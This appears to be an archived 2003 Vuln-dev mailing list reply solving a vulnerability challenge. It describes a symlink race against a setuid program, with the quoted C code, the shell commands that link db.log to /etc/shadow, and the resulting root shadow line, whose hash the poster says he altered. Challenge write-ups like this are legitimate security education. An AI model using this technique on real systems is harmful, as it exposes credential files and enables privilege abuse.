Vulnerability Development mailing list archives
Re: [Vuln-dev Challenge] Challenge #2
From: Thomas Cannon <tcannon () noops org>
Date: Fri, 23 May 2003 16:48:08 -0700
/* read log */ if ( (f1 = fopen("db.log", "r")) == NULL) return 1; if (fgets(bfp, BFSIZE, f1) == NULL) return 1;
...and if db.log is perhaps a symlink to /etc/shadow? I assumed the program would be chown'd to root, and set 4755. If this is an invalid assumption, well, no point in reading any further. I compiled the program, stopped it after it writing the input log, made a symlink, and resumed running the program, with lovely results: [tcannon@needle]$ rm db.log [tcannon@needle]$ ln -s /etc/shadow db.log [tcannon@needle]$ fg ./a.out a a root:$1$TlFzTwuXXX.yj55Gy2RVfUd8dSDAE/:11955:0:99999:7::: I like race conditions. No point in wasting your CPU -- that shadowed password did get modified before I sent it to the list :-) Cheers, --tcannon PS: Nice strcpy
Current thread:
- [Vuln-dev Challenge] Challenge #2 Dave McKinney (May 23)
- Re: [Vuln-dev Challenge] Challenge #2 Thomas Cannon (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 (SPOILER) Joel Eriksson (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 (SPOILER) Joel Eriksson (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Jason_Royes (May 24)
- [Vuln-dev Challenge] nonexec stack&heap solution (encrypted) Jose Ronnick (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 anon (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 spacewalker (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Jose Ronnick (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Diode Trnasistor (May 26)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 26)
- Re: [Vuln-dev Challenge] Challenge #2 Diode Trnasistor (May 26)
(Thread continues...)